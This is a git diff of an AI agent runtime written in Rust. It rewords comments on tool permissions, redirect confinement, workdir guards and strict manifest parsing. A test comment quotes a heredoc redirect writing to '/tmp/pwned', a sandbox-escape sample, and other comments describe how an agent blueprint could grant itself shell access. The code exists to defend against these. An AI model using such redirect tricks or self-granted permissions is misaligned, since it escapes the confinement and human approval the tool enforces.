 /// The keys a line produces under one shell's escape rule, for asserting both
 /// readings from either platform.
@@ -866,7 +865,7 @@ fn a_trailing_backslash_only_swallows_a_terminator_on_a_posix_shell() {
     assert_eq!(keys_under(r"echo trailing\", false), ["shell:echo"]);
 }
 
-// ─── Where a redirect may write (issue #289) ─────────────────────────────────
+// ─── Where a redirect may write ──────────────────────────────────────────────
 
 /// A discarded write is not a write, so nothing here needs confining. Pinned as
 /// hard as the dangerous cases: charging a workspace check to `2>/dev/null`

--- a/crates/leviath-cli/src/tools.rs
+++ b/crates/leviath-cli/src/tools.rs
@@ -504,19 +504,18 @@ fn target_path(target: &str, workdir: &std::path::Path) -> std::path::PathBuf {
 /// Tools a blueprint may declare *more* permissively than the built-in default
 /// without the user opting in.
 ///
-/// A blueprint used to be able to set any tool the user had not configured, and
-/// saying nothing is the normal state: nobody writes `shell = "ask"` into their
-/// config, because that is already the default. So an `agent.leviath` from `lev
-/// add` could give itself `shell = "allow"` on a stock machine, which is the
-/// opposite of what SECURITY.md promised.
+/// Without this list any tool the user had not configured would be loosenable,
+/// and saying nothing is the normal state: nobody writes `shell = "ask"` into
+/// their config, because that is already the default. An `agent.leviath` from
+/// `lev add` could then give itself `shell = "allow"` on a stock machine,
+/// which is the opposite of what SECURITY.md promises.
 ///
-/// The justification for allowing *any* loosening is real but much narrower than
-/// the behaviour it justified: a shipped agent should be able to pre-approve the
-/// tools that are its whole point, so the researcher does not prompt for every
-/// page it reads. Checking the ten bundled agents, the only policies any of them
-/// loosens relative to the default are these two - the rest of their
-/// `[tool_permissions]` lines are `ask`, or `allow` on tools that already
-/// default to `allow`.
+/// The justification for allowing *any* loosening is real but narrow: a
+/// shipped agent should be able to pre-approve the tools that are its whole
+/// point, so the researcher does not prompt for every page it reads. Checking
+/// the ten bundled agents, the only policies any of them loosens relative to
+/// the default are these two - the rest of their `[tool_permissions]` lines
+/// are `ask`, or `allow` on tools that already default to `allow`.
 ///
 /// An allowlist rather than a denylist of dangerous tools, for the reason
 /// `secrets.rs` gives about the same choice: a denylist has to be complete to be
@@ -954,12 +953,13 @@ mod policy_tests {
         ToolPolicy::Allow
     }
 
-    // ─── Redirect confinement (issue #289) ───────────────────────────────────
+    // ─── Redirect confinement ────────────────────────────────────────────────
 
     /// The asymmetry this closes. Under `--yolo` the write policy resolves to
-    /// `Allow`, so the clamp above passes the call through - and the target was
-    /// then never checked, while `write_file` on the same path is refused by
-    /// `resolve_within`. The shell was the spelling that worked.
+    /// `Allow`, so the clamp above passes the call through; with no separate
+    /// check the target is never looked at, while `write_file` on the same path
+    /// is refused by `resolve_within`. The shell must not be the spelling that
+    /// works.
     #[test]
     fn a_redirect_outside_the_workdir_is_refused() {
         let dir = tempfile::tempdir().expect("tempdir");
@@ -1007,10 +1007,10 @@ mod policy_tests {
     /// A redirect the tokenizer cannot read past is refused outright.
     ///
     /// A heredoc, a backtick, an unterminated quote and an unbalanced `$(`
-    /// each stop the line being read as commands, and the old answer was
-    /// "no targets found", which let `cat <<EOF > /tmp/pwned` through under
-    /// `--yolo` while the same path in `write_file` was refused. Every
-    /// redirect operator, under every construct, against a path outside.
+    /// each stop the line being read as commands. Answering "no targets found"
+    /// there would let `cat <<EOF > /tmp/pwned` through under `--yolo` while
+    /// the same path in `write_file` is refused. Every redirect operator, under
+    /// every construct, against a path outside.
     #[test]
     fn no_unreadable_redirect_escapes_the_workdir() {
         let dir = tempfile::tempdir().expect("tempdir");
@@ -1074,8 +1074,8 @@ mod policy_tests {
     /// a naive "is it absolute" test.
     ///
     /// Built from a real temp directory, so on Windows it carries real
-    /// backslashes - which is the case that used to fail, before the tokenizer
-    /// learned that `cmd.exe` does not read them as escapes.
+    /// backslashes - the case that breaks if the tokenizer reads a backslash as
+    /// an escape, which `cmd.exe` does not.
     #[test]
     fn an_absolute_path_into_the_workdir_is_allowed() {
         let dir = tempfile::tempdir().expect("tempdir");
@@ -1111,7 +1111,7 @@ mod policy_tests {
         );
     }
 
-    // ─── Write accounting (issue #252) ───────────────────────────────────────
+    // ─── Write accounting ────────────────────────────────────────────────────
 
     /// What each tool declares it will write, which is what lets an oversized
     /// `write_file` be stopped before a byte lands.
@@ -1364,7 +1364,7 @@ mod policy_tests {
         assert_eq!(blueprint_says("read_file", "ask", false), ToolPolicy::Ask);
     }
 
-    /// The case the old behaviour existed to serve: an agent whose whole point
+    /// The case the loosenable list exists to serve: an agent whose whole point
     /// is reading the web should not prompt for every page.
     #[test]
     fn a_blueprint_may_preapprove_the_read_only_web_tools() {
@@ -2119,10 +2119,10 @@ mod policy_tests {
 
     /// Policy is matched against the name the model calls, which is always the
     /// canonical `shell`, while a manifest, a config, or a `--allow` flag may
-    /// have written `bash`. Every one of those entries used to be dead:
-    /// `lev run --allow bash` did nothing at all, and `bash = "ask"` in the
-    /// shipped `coder` only behaved as intended because the default
-    /// for an unlisted tool is also `ask`.
+    /// have written `bash`. Without the alias fold every one of those entries
+    /// is dead: `lev run --allow bash` does nothing, and `bash = "ask"` in the
+    /// shipped `coder` looks right only because the default for an unlisted
+    /// tool is also `ask`.
     #[test]
     fn a_permission_written_as_an_alias_reaches_the_tool() {
         let policy = |layer: &str, spelling: &str, called: &str| {
@@ -2170,9 +2170,8 @@ mod policy_tests {
     }
 
     /// The context tools write the agent's own context regions, not the
-    /// filesystem, and they used to fall through to `Ask` - so a run that kept
-    /// notes paid a prompt per note, 25 of them on the run that prompted this
-    /// work.
+    /// filesystem, so they default to `Allow`. Falling through to `Ask` would
+    /// charge a run that keeps notes one prompt per note.
     #[test]
     fn the_context_tools_do_not_prompt() {
         for tool in [
@@ -2383,8 +2382,8 @@ mod policy_tests {
     ///   `[read_paths]`, so the prompt would be asking about a capability the
     ///   confinement has already decided.
     /// - **Context.** The `context_*` tools write the agent's own context
-    ///   regions, not the filesystem. They used to fall through to `Ask` and
-    ///   cost 25 prompts on one run, none of which a person could act on.
+    ///   regions, not the filesystem. A prompt per note is a prompt nobody can
+    ///   act on.
     /// - **Sub-agents.** These default to `Allow` so a fan-out does not stop on
     ///   a prompt nothing is there to answer. They are routed through policy
     ///   resolution anyway so a configured `deny` still counts.

--- a/crates/leviath-cli/src/tui/widgets/markdown_edit/mod.rs
+++ b/crates/leviath-cli/src/tui/widgets/markdown_edit/mod.rs
@@ -212,9 +212,9 @@ impl MarkdownEdit {
             self.apply(action);
             return MdOutcome::Edited;
         }
-        // `Ctrl-U` is underline now, and it used to be the textarea's undo.
-        // `Ctrl-Z` is what a person reaches for anyway, and it is already undo
-        // in the agent editor underneath this overlay.
+        // `Ctrl-U` is underline here, and that is the textarea's own undo key,
+        // so undo is `Ctrl-Z`: what a person reaches for anyway, and already
+        // undo in the agent editor underneath this overlay.
         match chord_char(key) {
             Some(('z', false)) => {
                 self.area.undo();
@@ -947,11 +947,11 @@ mod tests {
             .collect()
     }
 
-    // ── The bug this component exists for ──────────────────────────────────
+    // ── What this component exists for ─────────────────────────────────────
 
-    /// The regression: a task longer than the pane is wide used to scroll
-    /// sideways, so with the cursor at the end the *start* of what you had
-    /// written was off screen. Both ends have to be visible at once.
+    /// A task longer than the pane is wide wraps instead of scrolling
+    /// sideways: scrolling puts the *start* of what you had written off screen
+    /// once the cursor reaches the end. Both ends have to be visible at once.
     #[test]
     fn a_line_wider_than_the_pane_wraps_instead_of_scrolling_off_the_edge() {
         let mut md = edit("the quick brown fox jumps over the lazy dog");

--- a/crates/leviath-cli/src/workdir_guard.rs
+++ b/crates/leviath-cli/src/workdir_guard.rs
@@ -1,9 +1,9 @@
 //! Confirming a workdir that is somewhere an agent probably should not write.
 //!
 //! `lev run`'s workdir defaults to wherever it was invoked, and running from a
-//! home directory is an easy accident. Issue #252 is a machine that lost 115 GB
-//! to an agent writing under a profile root; the agent was doing what it was
-//! told, in the directory it was given.
+//! home directory is an easy accident. An agent turned loose under a profile
+//! root can eat tens of gigabytes while doing exactly what it was told, in the
+//! directory it was given.
 //!
 //! So this asks - once, and only about the two shapes that are alarming:
 //!
@@ -115,10 +115,10 @@ fn is_within(path: &std::path::Path, base: &std::path::Path) -> bool {
 /// parks the run until something times it out and reads as a hang.
 ///
 /// The cost of that choice is that the guard is advisory in exactly the
-/// unattended case issue #252 came from, so this line is the whole mitigation:
-/// it goes to stderr on every such run, names the directory, and says how to
-/// silence it. Someone reading the log afterwards should be able to find the
-/// moment an agent was pointed at a home directory.
+/// unattended case that has the most to lose, so this line is the whole
+/// mitigation: it goes to stderr on every such run, names the directory, and
+/// says how to silence it. Someone reading the log afterwards should be able
+/// to find the moment an agent was pointed at a home directory.
 pub(crate) fn non_interactive_warning(
     workdir: &std::path::Path,
     concern: &WorkdirConcern,

--- a/crates/leviath-core/src/blueprint/mod.rs
+++ b/crates/leviath-core/src/blueprint/mod.rs
@@ -338,9 +338,9 @@ impl Blueprint {
     /// Its own `[context.regions]` when it declares one, the blueprint's
     /// otherwise, plus the regions the runtime carries visible whatever a stage
     /// says. Narrower than [`known_region_names`](Self::known_region_names),
-    /// which asks only whether a name exists somewhere - the difference is the
-    /// whole of #370: a region another stage declares exists, and is still not
-    /// readable from here.
+    /// which asks only whether a name exists somewhere - the difference being
+    /// that a region another stage declares exists, and is still not readable
+    /// from here.
     fn regions_visible_to<'a>(&'a self, stage: &'a Stage) -> std::collections::HashSet<&'a str> {
         let layout = stage
             .context_layout
@@ -359,11 +359,11 @@ impl Blueprint {
 
     /// Refuse a region name that exists nowhere in the blueprint.
     ///
-    /// Routing and gates are addressed by name, and a name that matches nothing
-    /// used to be accepted in silence: the routed tool result went to the
-    /// default region and the gate held nothing back, both looking exactly like
-    /// a working config (#362). A gate that silently never fires is the
-    /// expensive case - it reads as the model behaving well.
+    /// Routing and gates are addressed by name, and a name that matches
+    /// nothing, accepted in silence, sends the routed tool result to the
+    /// default region and leaves the gate holding nothing back - both looking
+    /// exactly like a working config. A gate that silently never fires is the
+    /// expensive case: it reads as the model behaving well.
     fn validate_region_references(&self) -> std::result::Result<(), ValidationError> {
         let known = self.known_region_names();
         let checklists: std::collections::HashSet<&str> = self
@@ -411,8 +411,8 @@ impl Blueprint {
                 // region from its own `[context.regions]` hides it, so a result
                 // routed there is written somewhere the stage cannot read - and
                 // the pointer left in `conversation` tells the model to go read
-                // it. There is no reading of a blueprint where that was
-                // intended (#370).
+                // it. There is no reading of a blueprint where that is
+                // intended.
                 let visible = self.regions_visible_to(stage);
                 let dead_drop = |key: &str, region: &str| ValidationError::Stage {
                     stage: stage.name.clone(),
@@ -688,13 +688,11 @@ impl Blueprint {
                         return true;
                     }
                 }
-                // No target reaches a terminal stage. This used to fall back to
-                // "all targets are exhaustible, so the stage will eventually
-                // have zero available edges" and call THAT a terminal path -
-                // but running out of edges mid-graph is now a run *error*
-                // (StageResolution::DeadEnd in the runtime), not a completion,
-                // so certifying it here validated blueprints that could never
-                // finish successfully.
+                // No target reaches a terminal stage. Exhausting a stage's
+                // edges is not a terminal path: running out of edges mid-graph
+                // is a run *error* (StageResolution::DeadEnd in the runtime),
+                // not a completion, so certifying it here would validate
+                // blueprints that can never finish successfully.
                 false
             }
         }
@@ -1384,11 +1382,10 @@ criteria = { kind = "pinned", max_tokens = 10, seed = "criteria" }"#,
         );
         stage.transitions = Some(transitions);
         let bp = Blueprint::new("t".into(), "".into(), vec![stage], make_layout());
-        // Must FAIL now: this used to pass on the theory that the self-loop
-        // exhausts its max_revisits and "leaving zero edges" counts as
-        // terminal - but running out of edges mid-graph is a run error
-        // (StageResolution::DeadEnd), so a blueprint whose only ending is
-        // exhaustion can never finish successfully.
+        // Must fail: a self-loop exhausting its max_revisits leaves zero
+        // edges, which is a run error (StageResolution::DeadEnd) and not a
+        // terminal path, so a blueprint whose only ending is exhaustion can
+        // never finish successfully.
         let err = bp
             .validate()
             .expect_err("an exhaustion-only graph is invalid");
@@ -1519,7 +1516,7 @@ criteria = { kind = "pinned", max_tokens = 10, seed = "criteria" }"#,
         assert_ne!(InteractionStyle::FreeText, InteractionStyle::MultipleChoice);
     }
 
-    // ─── stuck detection (#106) ─────────────────────────────────────────────
+    // ─── stuck detection ────────────────────────────────────────────────────
 
     #[test]
     fn stuck_config_is_armed_only_when_a_threshold_is_set() {

--- a/crates/leviath-core/src/blueprint/stage.rs
+++ b/crates/leviath-core/src/blueprint/stage.rs
@@ -374,7 +374,7 @@ pub struct InteractionPoint {
 /// Each field names a `.rhai` file, resolved relative to the blueprint
 /// directory exactly as a custom region's script is. Every hook is optional and
 /// an agent that declares none pays nothing - no file is read and no engine is
-/// built (issue #260).
+/// built.
 ///
 /// The hook a script implements is the function it defines, named for the
 /// field: a file given as `on_stage_enter` must define `fn on_stage_enter(ctx)`.
@@ -483,7 +483,7 @@ pub struct Stage {
     ///
     /// An unattended run - `lev run --yolo`, or a child of one - drops every
     /// blocking human tool from the stage's advertised set, because a call to
-    /// one can only park the agent until the daemon dies (issue #204). Naming a
+    /// one can only park the agent until the daemon dies. Naming a
     /// tool here says this stage genuinely needs a person and the run should
     /// wait for one anyway, for as long as it takes; set `[limits]
     /// interaction_timeout_secs` to bound that wait.

--- a/crates/leviath-core/src/blueprint/transition.rs
+++ b/crates/leviath-core/src/blueprint/transition.rs
@@ -184,7 +184,7 @@ pub struct TransitionGate {
     /// says this and does not: it is one of several *alternative* ways to
     /// satisfy [`Self::require_modifications`], so
     /// `{ require_modifications = true, region = "plan" }` is met by writing
-    /// any file anywhere while `plan` stays empty (#371). That is the right
+    /// any file anywhere while `plan` stays empty. That is the right
     /// shape for what `region` is for - a restart-durable stand-in for
     /// per-stage counters, which do not survive a daemon restart - and the
     /// wrong shape for "this stage does not leave without writing X". This key
@@ -194,7 +194,7 @@ pub struct TransitionGate {
     /// blocking: `lev validate` refuses a gate naming a region no stage
     /// declares, so reaching that at runtime means a layout moved underneath
     /// the edge, and stranding a run over it would be worse than the missing
-    /// check. Saying nothing is what made the old behaviour hard to find.
+    /// check. The warning is what keeps the skipped check findable.
     #[serde(default)]
     pub require_regions: Vec<String>,
     /// Checklist region that must have no open items before this edge is taken.

--- a/crates/leviath-core/src/files.rs
+++ b/crates/leviath-core/src/files.rs
@@ -2,9 +2,8 @@
 //!
 //! One place for each name. The persistence lane writes these files, the
 //! CLI's run state reader, the recovery scan, the dashboard and the HTTP API
-//! read them back, and each of them used to spell the name out where it was
-//! used. A name that lives in one constant cannot be misspelled in one reader
-//! and quietly never match again.
+//! read them back. A name that lives in one constant cannot be misspelled in
+//! one reader and quietly never match again.
 
 /// The run's metadata: status, timings, totals. Written by the persistence
 /// lane on every change and read by everything that lists runs.

--- a/crates/leviath-core/src/interaction.rs
+++ b/crates/leviath-core/src/interaction.rs
@@ -264,9 +264,9 @@ impl InteractionRequest {
     /// `grant_keys` is what a `Stage` or `Run` approval would be remembered
     /// under, and it goes in the option labels rather than in `body` because
     /// the dashboard renders only `prompt` and `options` for this kind. Naming
-    /// it matters: the old wording offered "Allow for this session" on calls
-    /// the dispatcher then silently degraded to once, so the user chose a grant
-    /// they did not get.
+    /// it matters: a label promising more than the dispatcher will remember -
+    /// "Allow for this session" on a call it degrades to once - has the user
+    /// choose a grant they do not get.
     ///
     /// The options are fixed-position - every client maps an index to a scope
     /// through [`approval_choice`] - so the wording varies and the length does

--- a/crates/leviath-core/src/layout.rs
+++ b/crates/leviath-core/src/layout.rs
@@ -12,12 +12,11 @@ use serde::{Deserialize, Serialize};
 /// The region a stage's `system_prompt` is written into, when a blueprint
 /// declares one by this name.
 ///
-/// Stage instructions have always been pinned context - that is why they read
-/// as instruction rather than history - but the region holding them was chosen
-/// by accident: whichever pinned region happened to be declared first. That
-/// region then carried the prompt's tokens in the stage ledger under its own
-/// name, could not be sized or scoped, and sat wherever it sat in the cached
-/// prefix (#366).
+/// Stage instructions are pinned context - that is why they read as
+/// instruction rather than history - and a region of their own is what lets
+/// the stage ledger bill the prompt's tokens under a name that says what they
+/// are, sizes them, and places them in the cached prefix on purpose rather
+/// than wherever the first pinned region happens to sit.
 ///
 /// Declaring a region by this name gives the prompt a handle:
 ///
@@ -26,8 +25,8 @@ use serde::{Deserialize, Serialize};
 /// stage_instructions = { kind = "pinned", budget = "3%" }
 /// ```
 ///
-/// A blueprint that declares nothing by this name keeps the old behaviour
-/// exactly, so this costs no existing agent anything.
+/// A blueprint that declares nothing by this name still gets one: the runtime
+/// adds it at spawn, sized to the widest stage prompt the blueprint carries.
 pub const STAGE_INSTRUCTIONS_REGION: &str = "stage_instructions";
 
 /// How a region's token ceiling is expressed before it is resolved against a
@@ -602,9 +601,9 @@ pub struct RegionDefinition {
     pub max_tokens: usize,
 
     /// How this region's ceiling is expressed. Defaults (via [`Self::new`]) to
-    /// [`BudgetSpec::Absolute`] holding `max_tokens`, so a region built the old
-    /// way behaves exactly as before. A percentage budget is resolved against the
-    /// model context window at window-build time.
+    /// [`BudgetSpec::Absolute`] holding `max_tokens`, so a region that names a
+    /// token count directly gets an absolute ceiling. A percentage budget is
+    /// resolved against the model context window at window-build time.
     #[serde(default)]
     pub budget: BudgetSpec,
 
@@ -639,9 +638,9 @@ pub struct RegionDefinition {
     /// `transform = "compact"` reads as "summarize the transcript on the way
     /// out" and means "summarize every region that is not pinned", which
     /// includes the ones holding the run's results. Figures that survive a
-    /// paraphrase are no longer figures: a `results` region carrying computed
-    /// values was rewritten into prose before the stage that reports them saw
-    /// it (#369).
+    /// paraphrase are no longer figures: without this, a `results` region
+    /// carrying computed values is rewritten into prose before the stage that
+    /// reports them ever sees it.
     ///
     /// Setting this false protects the region wherever it is used, rather than
     /// at each of the N edges that might touch it. `clear` still applies - this
@@ -1264,8 +1263,8 @@ mod tests {
     }
 
     /// `validate` sums every region's ceiling to warn when they exceed the
-    /// budget. Two saturated ceilings used to overflow that sum and abort
-    /// instead of warning.
+    /// budget. Two saturated ceilings must warn rather than overflow that sum
+    /// and abort.
     #[test]
     fn validate_does_not_abort_when_region_ceilings_sum_past_usize_max() {
         let layout = ContextLayout::new(

--- a/crates/leviath-core/src/manifest.rs
+++ b/crates/leviath-core/src/manifest.rs
@@ -30,7 +30,6 @@ pub fn parse_manifest(content: &str) -> Result<Blueprint> {
 
     let entry_stage = str_of(agent, "entry_stage").map(|s| s.to_string());
 
-    // Issue #97 escape hatch: `[agent] dynamic_tools` (default false).
     let dynamic_tools = bool_of(agent, "dynamic_tools").unwrap_or(false);
 
     let mut stages = Vec::new();

--- a/crates/leviath-core/src/manifest/read.rs
+++ b/crates/leviath-core/src/manifest/read.rs
@@ -1,12 +1,10 @@
 //! Reading one typed field off a TOML value.
 //!
 //! The manifest parser asks "the string under this key, if there is one"
-//! well over a hundred times, and every ask used to be the same
-//! `v.get(key).and_then(|v| v.as_str())` spelled out in place. These are
-//! that ask, once per type, so a site reads as what it wants rather than how
-//! it gets it. Each returns `None` both for an absent key and for a value of
-//! the wrong type, exactly as the inline form did; a caller that wants to
-//! tell those apart still looks at the value itself.
+//! well over a hundred times. These are that ask, once per type, so a site
+//! reads as what it wants rather than how it gets it. Each returns `None`
+//! both for an absent key and for a value of the wrong type; a caller that
+//! wants to tell those apart still looks at the value itself.
 
 use crate::error::{Error, Result};
 
@@ -55,12 +53,10 @@ pub(super) fn int_of(v: &impl Fields, key: &str) -> Option<i64> {
 /// The count under `key`: a non-negative integer, if the key is present and
 /// holds an integer at all. `where_` names the table for the error.
 ///
-/// Every count a manifest carries used to go through `as usize`, so
-/// `max_items = -1` became the largest possible cap and read at a glance as
-/// "no limit", the opposite of what was written; a few keys dropped the value
-/// instead. Either way nothing said so. A negative is refused here, naming
-/// the key and the value, so the file fails to load rather than loading
-/// looser than it reads.
+/// A negative is refused here, naming the key and the value, so the file
+/// fails to load rather than loading looser than it reads: `as usize` would
+/// turn `max_items = -1` into the largest possible cap, which reads at a
+/// glance as "no limit" and is the opposite of what was written.
 pub(super) fn count_of(v: &impl Fields, where_: &str, key: &str) -> Result<Option<usize>> {
     match int_of(v, key) {
         None => Ok(None),

--- a/crates/leviath-core/src/manifest/regions.rs
+++ b/crates/leviath-core/src/manifest/regions.rs
@@ -80,9 +80,10 @@ pub(super) fn parse_region_layout(
                         EvictionStrategy::Compact { compact_count }
                     }
                     Some("per_item") | None => EvictionStrategy::PerItem,
-                    // Unknown used to mean per_item, so `strategy = "per-item"`
-                    // or a mistyped `compact` left the region evicting one
-                    // entry at a time with no sign the setting was read.
+                    // Refused rather than folded into per_item: `strategy =
+                    // "per-item"` or a mistyped `compact` would leave the
+                    // region evicting one entry at a time with no sign the
+                    // setting was read.
                     Some(other) => {
                         return Err(Error::Other(format!(
                             "region '{region_name}': strategy \"{other}\" is not \
@@ -143,10 +144,10 @@ pub(super) fn parse_region_layout(
                 RegionKind::Custom { script, persistent }
             }
             unknown => {
-                // A typo'd kind used to silently become Temporary - for a
-                // custom region that would mean the script never runs, with
-                // no signal anywhere. Fail at load instead; `lev validate`
-                // surfaces this immediately.
+                // Refused rather than folded into Temporary: for a custom
+                // region that would mean the script never runs, with no
+                // signal anywhere. Failing at load lets `lev validate`
+                // surface it immediately.
                 return Err(Error::Other(format!(
                     "region '{region_name}': unknown kind \"{unknown}\" (valid kinds: \
                      pinned, sliding_window, temporary, compacting, clearable, \

--- a/crates/leviath-core/src/manifest/sections.rs
+++ b/crates/leviath-core/src/manifest/sections.rs
@@ -80,9 +80,9 @@ pub(super) fn parse_safe_commands(
 /// Flatten `[tool_permissions]` into the `tool_perm:<tool>` metadata keys the
 /// permission layer reads.
 ///
-/// This used to drop a value it could not read and say "the value's meaning is
-/// validated where it is resolved". It was not: resolution maps anything it
-/// does not recognise to `ask`, so a misspelled `deny` became a prompt.
+/// A value that cannot be read is refused here rather than left to
+/// resolution: resolution maps anything it does not recognise to `ask`, so a
+/// misspelled `deny` would become a prompt.
 pub(super) fn tool_permission_metadata(
     table: &toml::value::Table,
 ) -> Result<Vec<(String, serde_json::Value)>> {
@@ -168,8 +168,8 @@ pub(super) fn parse_security_config(security_table: &toml::value::Table) -> crat
 }
 
 /// Every key read off a `[sandbox]` table. Anything else is refused: a
-/// misspelled `netwrok = false` used to be ignored, leaving the sandbox
-/// looser than the file said. The schema guard in `tests.rs` holds the
+/// misspelled `netwrok = false` would otherwise be ignored, leaving the
+/// sandbox looser than the file said. The schema guard in `tests.rs` holds the
 /// published schema to this list.
 pub(super) const SANDBOX_KEYS: &[&str] = &[
     "engine",

--- a/crates/leviath-core/src/manifest/stage.rs
+++ b/crates/leviath-core/src/manifest/stage.rs
@@ -130,12 +130,12 @@ pub(super) fn validate_tool_policy(where_: &str, tool: &str, policy: &str) -> Re
 
 /// Refuse a key the parser does not read.
 ///
-/// The manifest parser walks the TOML by hand, so every unrecognised key was
-/// accepted and ignored: a blueprint could be wrong in a way `lev validate`
-/// called good, and the only symptom was a stage behaving as though the line
-/// had not been written - which is what it was doing (#362). Region kinds and
-/// transition conditions have always been strict; this extends that to the
-/// tables holding them, with the same "valid: …" phrasing.
+/// The manifest parser walks the TOML by hand, so an unrecognised key it does
+/// not refuse is accepted and ignored: the blueprint is wrong in a way `lev
+/// validate` calls good, and the only symptom is a stage behaving as though
+/// the line had not been written. Region kinds and transition conditions are
+/// strict for the same reason; this extends that to the tables holding them,
+/// with the same "valid: …" phrasing.
 pub(super) fn reject_unknown_keys(
     where_: &str,
     table: &toml::value::Table,
@@ -162,12 +162,12 @@ pub(super) fn reject_unknown_keys(
 /// read_file = { region = "bulk", max_result_tokens = 500 }   # route and cap it
 /// ```
 ///
-/// Anything else is an error. It used to be silently skipped, which cost more
-/// than the unsupported shape did: the entry fell through, so the tool lost the
-/// region it named *as well as* the cap, and landed in `default_region`
-/// uncapped - while `lev validate` called the blueprint good. A config that
-/// reads as if two limits are in force while neither is costs real money before
-/// anyone thinks to check (#361).
+/// Anything else is an error rather than a skipped entry: skipping costs more
+/// than the unsupported shape does, because the tool loses the region it named
+/// *as well as* the cap and lands in `default_region` uncapped while `lev
+/// validate` calls the blueprint good. A config that reads as if two limits
+/// are in force while neither is costs real money before anyone thinks to
+/// check.
 fn parse_tool_override(
     stage_name: &str,
     tool_name: &str,
@@ -581,10 +581,10 @@ pub(super) fn parse_stage(stage_name: &str, stage_value: &toml::Value) -> Result
 ///
 /// `Ok(None)` when the key is absent, so the caller picks the default;
 /// `Ok(Some(n))` for a non-negative integer. Anything else is an error rather
-/// than a silent fallback: `max_workers = -1` used to wrap to the largest
-/// `usize` and so run unbounded, while `max_items = "twelve"` read as no cap at
-/// all - both of which show up as an unexpectedly wide fan-out, the wrong place
-/// to first hear about a typo. `zero_means` is what `0` does, per key.
+/// than a silent fallback: `max_workers = -1` would wrap to the largest
+/// `usize` and so run unbounded, while `max_items = "twelve"` would read as no
+/// cap at all - both of which show up as an unexpectedly wide fan-out, the
+/// wrong place to first hear about a typo. `zero_means` is what `0` does, per key.
 fn fan_out_number(
     stage_value: &toml::Value,
     stage_name: &str,
@@ -737,10 +737,10 @@ pub(super) fn apply_stage_mode(
             let on_worker_failure = match str_of(stage_value, "on_worker_failure") {
                 Some("fail_all") => crate::blueprint::WorkerFailurePolicy::FailAll,
                 Some("continue") | None => crate::blueprint::WorkerFailurePolicy::Continue,
-                // Unknown used to mean continue, so a misspelled `fail_all`
-                // let a fan-out swallow every worker failure - the opposite of
-                // what was written, and invisible in a run that then merged
-                // nothing.
+                // Refused rather than folded into continue: a misspelled
+                // `fail_all` would let a fan-out swallow every worker failure -
+                // the opposite of what was written, and invisible in a run that
+                // then merged nothing.
                 Some(other) => {
                     return Err(Error::Other(format!(
                         "stage '{stage_name}': on_worker_failure = \"{other}\" \
@@ -771,13 +771,12 @@ pub(super) fn apply_stage_mode(
         }
         "output" => stage.with_mode(StageMode::Output),
         "autonomous" => stage.with_mode(StageMode::Autonomous),
-        // A misspelled mode used to become an autonomous stage in
-        // silence, so `mode = "outupt"` produced a stage that ran
-        // normally and never asked for the output it was written to
-        // produce. Region kinds have always rejected an unknown
-        // `kind` for the same reason; this brings stage modes into
-        // line. Any manifest this refuses was already not doing what
-        // it said.
+        // Refused rather than folded into autonomous: `mode =
+        // "outupt"` would produce a stage that ran normally and
+        // never asked for the output it was written to produce.
+        // Region kinds reject an unknown `kind` for the same
+        // reason. Any manifest this refuses is not doing what it
+        // says.
         unknown => {
             return Err(Error::Other(format!(
                 "stage '{stage_name}': unknown mode \"{unknown}\" (valid modes: \
@@ -1008,8 +1007,8 @@ pub(super) fn parse_transition_gate(
             .filter_map(|v| v.as_str().map(|s| s.to_string()))
             .collect();
     }
-    // A negative budget is a typo, not "never hold the stage", and used to
-    // fall back to the default without a word. It is refused now.
+    // A negative budget is a typo, not "never hold the stage", so it is
+    // refused rather than falling back to the default without a word.
     if let Some(max) = count_of(table, where_, "max_attempts")? {
         gate.max_attempts = Some(max);
     }
@@ -1022,7 +1021,7 @@ pub(super) fn parse_transition_gate(
 /// Zero reads as unset - mirroring `enforce_max_iterations`, where `max == 0`
 /// means "unlimited" - so `stuck_after_iterations = 0` leaves the edge unarmed
 /// and the caller rejects it, rather than the edge firing on turn zero. A
-/// negative used to read as unset too, silently; it is refused now.
+/// negative is refused rather than read as unset.
 pub(super) fn parse_stuck_config(where_: &str, edge: &toml::Value) -> Result<Option<StuckConfig>> {
     let threshold = |key: &str| count_of(edge, where_, key).map(|n| n.filter(|n| *n > 0));
     let cfg = StuckConfig {
@@ -1057,8 +1056,8 @@ pub(super) fn parse_nudge_config(
     if let Some(enabled) = bool_of(table, "enabled") {
         nudge.enabled = Some(enabled);
     }
-    // A negative count is a typo, not "never accept the text", and used to
-    // fall back to inheriting without a word. It is refused now.
+    // A negative count is a typo, not "never accept the text", so it is
+    // refused rather than inheriting without a word.
     if let Some(max) = count_of(table, where_, "max")? {
         nudge.max = Some(max);
     }

--- a/crates/leviath-core/src/manifest/tests.rs
+++ b/crates/leviath-core/src/manifest/tests.rs
@@ -325,7 +325,7 @@ mode = "autonomous"
     );
 }
 
-// ─── stuck detection (#106) ─────────────────────────────────────────────
+// ─── stuck detection ────────────────────────────────────────────────────
 
 /// Build a two-stage manifest whose `analyze → next` edge carries `body`.
 fn stuck_edge_manifest(body: &str) -> String {
@@ -1712,8 +1712,8 @@ directives = { "Revise" = "Call ask_user_text to find out what to change." }
     assert_eq!(points[0].edit_options, vec!["Edit".to_string()]);
 }
 
-/// The unattended opt-out (issue #204): absent means the point waves itself
-/// through under `--yolo`, `"ask"` means it holds for a person.
+/// The unattended opt-out: absent means the point waves itself through under
+/// `--yolo`, `"ask"` means it holds for a person.
 #[test]
 fn parse_manifest_interaction_point_unattended_policy() {
     let toml = |line: &str| {
@@ -2453,9 +2453,9 @@ max_workers = 0
 }
 
 /// A negative or non-numeric cap is a mistake the author should hear about at
-/// parse time. `max_workers = -1` used to wrap to the largest `usize` and run
-/// unbounded, and `max_items = "twelve"` was read as no cap at all; both showed
-/// up only as a fan-out wider than the manifest appeared to allow.
+/// parse time. `max_workers = -1` would wrap to the largest `usize` and run
+/// unbounded, and `max_items = "twelve"` would read as no cap at all; both
+/// show up only as a fan-out wider than the manifest appears to allow.
 #[test]
 fn parse_manifest_fan_out_rejects_a_negative_or_non_numeric_cap() {
     for (key, value, wants) in [
@@ -2739,8 +2739,8 @@ name = "no-regions"
 
 #[test]
 fn parse_manifest_unknown_region_kind_is_a_hard_error() {
-    // A typo'd kind used to silently become Temporary - for a custom
-    // region that meant the script never ran, with no signal. The error
+    // A typo'd kind must not fold into Temporary: for a custom region
+    // that would mean the script never runs, with no signal. The error
     // names the region, the bad value, and the valid kinds.
     let toml = r#"
 [agent]
@@ -2782,9 +2782,9 @@ mode = "interactive"
     assert_eq!(default.mode, StageMode::Autonomous);
 }
 
-/// A misspelled mode used to become an autonomous stage in silence, so a
